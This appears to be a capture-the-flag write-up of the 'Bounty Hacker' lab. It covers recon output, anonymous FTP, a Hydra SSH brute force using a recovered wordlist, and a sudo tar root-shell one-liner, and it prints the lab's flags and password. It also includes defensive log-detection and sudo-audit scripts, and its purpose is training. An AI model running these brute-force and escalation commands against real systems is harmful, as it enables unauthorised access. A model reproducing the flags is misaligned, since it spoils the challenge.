Recon

Nmap

# Nmap 7.95 scan initiated Wed Oct 16 20:59:35 2024 as: nmap -A -T3 -p 1-1000 -Pn -oN nmap.log 10.10.143.254
Nmap scan report for 10.10.143.254
Host is up (0.26s latency).
Not shown: 995 filtered tcp ports (no-response)
PORT    STATE  SERVICE  VERSION
20/tcp  closed ftp-data
21/tcp  open   ftp      vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.11.79.35
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
22/tcp  open   ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 dc:f8:df:a7:a6:00:6d:18:b0:70:2b:a5:aa:a6:14:3e (RSA)
|   256 ec:c0:f2:d9:1e:6f:48:7d:38:9a:e3:bb:08:c4:0c:c9 (ECDSA)
|_  256 a4:1a:15:a5:d4:b1:cf:8f:16:50:3a:7d:d0:d8:13:c2 (ED25519)
80/tcp  open   http     Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
990/tcp closed ftps
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Oct 16 21:00:30 2024 -- 1 IP address (1 host up) scanned in 54.51 seconds

Nuclei

[waf-detect:apachegeneric] [http] [info] http://10.10.143.254
[CVE-2023-48795] [javascript] [medium] 10.10.143.254:22 ["Vulnerable to Terrapin"]
[ssh-sha1-hmac-algo] [javascript] [info] 10.10.143.254:22
[ssh-server-enumeration] [javascript] [info] 10.10.143.254:22 ["SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8"]
[ssh-password-auth] [javascript] [info] 10.10.143.254:22
[ftp-anonymous-login] [tcp] [medium] 10.10.143.254:21
[openssh-detect] [tcp] [info] 10.10.143.254:22 ["SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8"]
[http-missing-security-headers:clear-site-data] [http] [info] http://10.10.143.254
[http-missing-security-headers:cross-origin-embedder-policy] [http] [info] http://10.10.143.254
[http-missing-security-headers:strict-transport-security] [http] [info] http://10.10.143.254
[http-missing-security-headers:x-frame-options] [http] [info] http://10.10.143.254
[http-missing-security-headers:x-content-type-options] [http] [info] http://10.10.143.254
[http-missing-security-headers:referrer-policy] [http] [info] http://10.10.143.254
[http-missing-security-headers:cross-origin-resource-policy] [http] [info] http://10.10.143.254
[http-missing-security-headers:content-security-policy] [http] [info] http://10.10.143.254
[http-missing-security-headers:permissions-policy] [http] [info] http://10.10.143.254
[http-missing-security-headers:x-permitted-cross-domain-policies] [http] [info] http://10.10.143.254
[http-missing-security-headers:cross-origin-opener-policy] [http] [info] http://10.10.143.254
[options-method] [http] [info] http://10.10.143.254 ["GET,HEAD,POST,OPTIONS"]
[apache-detect] [http] [info] http://10.10.143.254 ["Apache/2.4.18 (Ubuntu)"]

As can be seen, FTP allows anonymous login.

Analysis

We can log in to FTP using the anonymous account:

ftp 10.10.143.254
Connected to 10.10.143.254.
220 (vsFTPd 3.0.3)
Name (10.10.143.254:aleister): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

Two files are found. The first is task.txt with the following content:

1.) Protect Vicious.
2.) Plan for Red Eye pickup on the moon.
 
-lin

The second file is locks.txt with the following content:

rEddrAGON
ReDdr4g0nSynd!cat3
Dr@gOn$yn9icat3
R3DDr46ONSYndIC@Te
ReddRA60N
R3dDrag0nSynd1c4te
dRa6oN5YNDiCATE
ReDDR4g0n5ynDIc4te
R3Dr4gOn2044
RedDr4gonSynd1cat3
R3dDRaG0Nsynd1c@T3
Synd1c4teDr@g0n
reddRAg0N
REddRaG0N5yNdIc47e
Dra6oN$yndIC@t3
4L1mi6H71StHeB357
rEDdragOn$ynd1c473
DrAgoN5ynD1cATE
ReDdrag0n$ynd1cate
Dr@gOn$yND1C4Te
RedDr@gonSyn9ic47e
REd$yNdIc47e
dr@goN5YNd1c@73
rEDdrAGOnSyNDiCat3
r3ddr@g0N
ReDSynd1ca7e

This looks like a word list.

Exploit

Use the word list just found to brute force SSH with Hydra, with lin as the username:

hydra -l lin -P ./locks.txt ssh://10.10.143.254 -t 4 -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
 
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-10-16 21:13:46
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 26 login tries (l:1/p:26), ~7 tries per task
[DATA] attacking ssh://10.10.143.254:22/
[22][ssh] host: 10.10.143.254   login: lin   password: RedDr4gonSynd1cat3
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-10-16 21:13:57
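From the defender's side, a run like the one above leaves a burst of failed sshd logins from one source followed by a success. The script below is an added example, not part of the original write-up: it runs a sliding-window detector over constructed auth.log lines (the IPs, PIDs and ports are made up) and flags the source once it reaches the failure threshold, noting whether a login succeeded afterwards.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample auth.log lines (not captured from the box): a burst of
# failed password logins from one source, then a success, as a Hydra run leaves.
SAMPLE_AUTH_LOG = """\
Oct 16 21:13:47 bountyhacker sshd[1201]: Failed password for lin from 10.11.79.35 port 50212 ssh2
Oct 16 21:13:47 bountyhacker sshd[1202]: Failed password for lin from 10.11.79.35 port 50214 ssh2
Oct 16 21:13:48 bountyhacker sshd[1203]: Failed password for lin from 10.11.79.35 port 50216 ssh2
Oct 16 21:13:49 bountyhacker sshd[1204]: Failed password for lin from 10.11.79.35 port 50218 ssh2
Oct 16 21:13:50 bountyhacker sshd[1205]: Failed password for lin from 10.11.79.35 port 50220 ssh2
Oct 16 21:13:52 bountyhacker sshd[1206]: Failed password for lin from 10.11.79.35 port 50222 ssh2
Oct 16 21:13:55 bountyhacker sshd[1207]: Accepted password for lin from 10.11.79.35 port 50230 ssh2
Oct 16 21:20:01 bountyhacker sshd[1300]: Failed password for lin from 192.0.2.7 port 40001 ssh2
Oct 16 21:25:03 bountyhacker sshd[1301]: Accepted publickey for lin from 192.0.2.7 port 40002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)

def parse_ts(ts, year=2024):
    # syslog timestamps carry no year; assume one for the arithmetic
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")

def detect_bruteforce(log_text, threshold=5, window_s=60):
    """Return {(ip, user): {"failures": n, "success_after": bool}} for every
    source that reached `threshold` failed logins within `window_s` seconds."""
    fails = defaultdict(list)   # (ip, user) -> timestamps of recent failures
    alerts = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        key = (m["ip"], m["user"])
        t = parse_ts(m["ts"])
        if m["result"] == "Failed":
            # keep only failures that fall inside the sliding window
            fails[key] = [x for x in fails[key] if (t - x).total_seconds() <= window_s]
            fails[key].append(t)
            if len(fails[key]) >= threshold and key not in alerts:
                alerts[key] = {"failures": len(fails[key]), "success_after": False}
        elif key in alerts:
            # a success after the burst means a guessed password worked
            alerts[key]["success_after"] = True
    return alerts
```

The second source in the sample has a single failure and a key-based login, so it stays below the threshold and is not reported.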

Log in over SSH with the password just found and read the user flag:

lin@bountyhacker:~/Desktop$ cat user.txt
THM{CR1M3_SyNd1C4T3}

Escalate

Enumeration shows that we can run tar with sudo:

lin@bountyhacker:/home$ cd /root
-bash: cd: /root: Permission denied
lin@bountyhacker:/home$ cat /proc/version
Linux version 4.15.0-101-generic (buildd@lgw01-amd64-052) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.12)) #102~16.04.1-Ubuntu SMP Mon May 11 11:38:16 UTC 2020
lin@bountyhacker:/home$ sudo -l
[sudo] password for lin: 
Matching Defaults entries for lin on bountyhacker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
 
User lin may run the following commands on bountyhacker:
    (root) /bin/tar
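The rule above grants /bin/tar as root with no argument restriction and no NOEXEC tag, which is what makes the escalation possible. As an added example that is not part of the original write-up, the script below audits "sudo -l" output for that pattern; the sample input repeats the box's real rule and adds two hypothetical rules for contrast.

```python
import re

# Constructed "sudo -l" output (not captured from the box): the write-up's real
# rule for tar plus two hypothetical rules added to show the contrast.
SAMPLE_SUDO_L = """\
User lin may run the following commands on bountyhacker:
    (root) /bin/tar
    (root) NOEXEC: /bin/tar -cf /backup/home.tar /home/lin
    (root) NOPASSWD: /usr/bin/systemctl status apache2
"""

# "(runas) TAG: TAG: command args" as sudo -l prints each rule
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$"
)

def rate_rule(runas, tags, cmd):
    """Rate one rule: 'high' = any arguments allowed and child processes not
    blocked (so tar --checkpoint-action can spawn a shell), 'medium' = any
    arguments but NOEXEC blocks exec(), 'low' = fixed arguments but no NOEXEC,
    'ok' = fixed arguments and NOEXEC. Only rules running as root are rated."""
    if "root" not in runas and "ALL" not in runas:
        return "ok"
    any_args = len(cmd.split()) == 1    # a bare path means sudo accepts any args
    noexec = "NOEXEC:" in tags
    if any_args and not noexec:
        return "high"
    if any_args:
        return "medium"
    if not noexec:
        return "low"
    return "ok"

def audit_sudo_rules(sudo_l_output):
    """Return [(command, rating)] for every rule that is not 'ok'."""
    findings, in_rules = [], False
    for line in sudo_l_output.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if m and (rating := rate_rule(m["runas"], m["tags"], m["cmd"])) != "ok":
            findings.append((m["cmd"], rating))
    return findings
```

NOEXEC works by preloading a library into the command, so it only constrains dynamically linked programs; the rating assumes it is effective for the binary in question.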

Use the following command to escalate to root:

lin@bountyhacker:/home$ sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
tar: Removing leading `/' from member names
# whoami
root

Read the root flag:

# cat root.txt
THM{80UN7Y_h4cK3r}

Flag(s)

User: THM{CR1M3_SyNd1C4T3}
Root: THM{80UN7Y_h4cK3r}

References